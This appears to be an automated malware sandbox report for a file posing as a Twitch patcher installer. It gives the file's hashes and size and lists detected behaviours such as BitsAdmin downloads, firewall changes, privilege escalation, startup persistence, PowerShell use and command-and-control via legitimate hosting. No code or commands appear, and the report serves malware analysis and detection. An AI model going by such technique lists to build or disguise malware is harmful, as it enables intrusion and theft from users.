General

  • Target

    Twitch-Patcheur-30.2.3-Windows-Installer.exe

  • Size

    346KB

  • Sample

    240817-xbpspatcqp

  • MD5

    db9793f028e6bb71003f7d75673de99e

  • SHA1

    03a31b6cb26c9e6deca14d2cc7e71f67bf61c986

  • SHA256

    3b36c155ce5aa68a3100ad8337ba880b6a3f9facfd254531317fec0731db244d

  • SHA512

    5dc8a769771c20cffa753e6bcf04fa5a7113ecef3b97818c924c2843f820b94746137285dc900d0508c15a1fe341624d996115bdeea398e4f4b1a34acee0c34f

  • SSDEEP

    6144:xt5hBPi0BW69hd1MMdxPe9N9uA069TB4kOAF4fffNJmfg+O+j8kwCo1:xtzww69T+kHF4fffNJmfg+O+jfLo1

Malware Config

Targets

    • Target

      Twitch-Patcheur-30.2.3-Windows-Installer.exe

    • Size

      346KB

    • MD5

      db9793f028e6bb71003f7d75673de99e

    • SHA1

      03a31b6cb26c9e6deca14d2cc7e71f67bf61c986

    • SHA256

      3b36c155ce5aa68a3100ad8337ba880b6a3f9facfd254531317fec0731db244d

    • SHA512

      5dc8a769771c20cffa753e6bcf04fa5a7113ecef3b97818c924c2843f820b94746137285dc900d0508c15a1fe341624d996115bdeea398e4f4b1a34acee0c34f

    • SSDEEP

      6144:xt5hBPi0BW69hd1MMdxPe9N9uA069TB4kOAF4fffNJmfg+O+j8kwCo1:xtzww69T+kHF4fffNJmfg+O+jfLo1

    • Blocklisted process makes network request

    • Download via BitsAdmin

    • Modifies Windows Firewall

    • Possible privilege escalation attempt

    • Drops startup file

    • Loads dropped DLL

    • Modifies file permissions

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

    • Legitimate hosting services abused for malware hosting/C2

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

MITRE ATT&CK Enterprise v15

Tasks